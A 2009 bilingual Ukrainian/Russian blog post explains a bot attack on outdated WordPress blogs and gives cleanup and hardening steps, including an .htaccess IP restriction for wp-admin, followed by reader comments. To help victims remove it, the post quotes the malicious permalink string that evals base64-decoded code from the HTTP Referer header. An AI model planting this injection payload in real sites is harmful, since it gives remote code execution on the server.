sitemap archive

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

в категорії wordpress фішки

теґи :

Українською

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

захищаєм блог від хакерівТак в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв'яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

  • зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
  • створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    а якщо у вас динамічна айпішка, то краще напишіть так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

  • Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп'ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам'ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

По русски

Вчера прошла волна атаки и взлома блогов на вордпрессе. И если погуглить, то можно судить, что пострадали тысячи блогов.

Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии WordPress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.

И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: корисні функції в functions.php — советую и вам так же сделать ;)

А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:

  • В настройках ЧПУ, поменять с
    /%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас может отличаться структура, по аналогии думаю поймете, что где поменять :))
  • Найдите последнего зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Обновите WordPress до версии 2.8.4

А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.
Для это сделайте следующее:

  • зайдите на сайт myip.ru чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173
  • создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    в случае динамического IP-адреса, напишите так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте здесь.

  • Сохраните файл. Все.

Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и временно переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «Это я еще должен и пароль на фтп помнить для таких случаев?» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»

Берегите себя и берегите свой блог.

Post to Twitter

18 коментарівrss-comments

[@] ]]>ELECTRIC]]> 7 Вересня 2009 09:10

Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.

]]>lilumi]]> 7 Вересня 2009 10:22

ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.

 
 
[@] ]]>ELECTRIC]]> 7 Вересня 2009 22:54

щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.

 
]]>virua]]> 8 Вересня 2009 09:48

Можу погодитися з думкою ELECTRIC’а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.

]]>lilumi]]> 10 Вересня 2009 10:59

судячи з коментарів у Лекактуса: http://lecactus.ru/2009/09/06/4712/#comment-33308 — навіть при закритій реєстрації бот умудряється реєструватись

 
 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:33

Я обмежив доступ по ір, у мене постійна адреса.

 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:38

До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.

]]>lilumi]]> 16 Вересня 2009 19:40

правильно робиш

 
 
[@] ]]>Homelab]]> 20 Вересня 2009 20:53

Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно… таке життя

 
[@] ]]>maque]]> 6 Жовтня 2009 17:47

Мій блоґ ніби на місці. Слава Богу!

 
]]>kkostishin]]> 20 Лютого 2010 16:30

Дякую за статтю! Але вже переконався на практиці, що бекапи – надзвичайно потрібна річ!!!

 
[@] ]]>maque]]> 5 Вересня 2010 01:03

Перепрошую за офф-топ, але мене цікавить, чи Ви приймаєте гостьові пости. Якщо так, то якої тематики. Дякую.

]]>lilumi]]> 5 Вересня 2010 11:36

Привіт. в принципі як експеримент можна попробувати гостьовий пост. Тематика: цікаве про комп’ютери, інтернет-сервіси, про якісь фішки для WordPress

 
 
[@] ]]>maque]]> 5 Вересня 2010 12:05

Дякую за відповідь. Подумаю, що можу цікавого запропонувати. :)

 
]]>Макс]]> 2 Грудня 2010 09:29

Давно використовую .htaccess для обмеження доступу в адмін частину у сайтах які будую на вордпресі, і виявляється не дарма.

 
[@] ]]>Тетяна]]> 13 Грудня 2010 10:16

А якщо вже взломали,що тодi робити???

]]>lilumi]]> 13 Грудня 2010 12:46

ну якщо сайт не робочий, то відновити з бекапу, поміняти паролі і обновити вордпресс та плагіни

 
 
]]>Peter L.]]> 20 Грудня 2010 21:04

Хорошая статья и много полезной информации. Держите его вверх.

 

Ваш коментар

LilumiМене звати LiluMi, а це мій блоґ. Тут про веб-розробку та лайфхаки. Рекомендую підписатись на RSS Інформацію про мене читайте на сторінці me LiluMi
UA TOP Bloggers

Тобі передають привіт 88 медвежаток. Це підняло тобі настрій на 2,168 а в Австралії живе колібрі у якої дзьобик довжиною на 42.78см.